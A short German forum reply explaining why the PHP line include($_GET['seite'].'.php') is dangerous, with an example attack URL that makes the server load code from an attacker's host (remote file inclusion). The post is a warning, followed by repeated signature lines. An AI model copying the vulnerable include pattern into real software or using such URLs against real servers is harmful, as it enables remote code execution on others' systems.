nicht angemeldet
Hallo Martin.
Nimm doch einfach mal wie von Alexander gepostet das hier:
include($_GET['seite'].'.php');UNd jetzt kommt der böse Cracker und ruft deine Seite wie folgt auf: http://www.example.org/include_skript.php?seite=http://www.example.com/seite_des_hackers.php (natürlich URL-encoded) - und schon wird fremder Code auf deinem Server ausgeführt - nich gut!
Es wird also die Resource http://www.example.com/seite_des_hackers.php.php eingebunden...
Einen schönen Dienstag noch.
Gruß, Ashura
--
Selfcode: sh:( fo:} ch:? rl:( br: n4:~ ie:{ mo:| va:) de:> zu:) fl:( ss:) ls:[ js:|
30 Days to becoming an Opera8 Lover -- Opera Mini on Treo
Meine Browser: Opera 8.02 | Firefox 1.0.6 | Lynx 2.8.5 | Netscape 4.7 | IE 6.0
[Deshalb frei! - Argumente pro freie Software]
Selfcode: sh:( fo:} ch:? rl:( br: n4:~ ie:{ mo:| va:) de:> zu:) fl:( ss:) ls:[ js:|
30 Days to becoming an Opera8 Lover -- Opera Mini on Treo
Meine Browser: Opera 8.02 | Firefox 1.0.6 | Lynx 2.8.5 | Netscape 4.7 | IE 6.0
[Deshalb frei! - Argumente pro freie Software]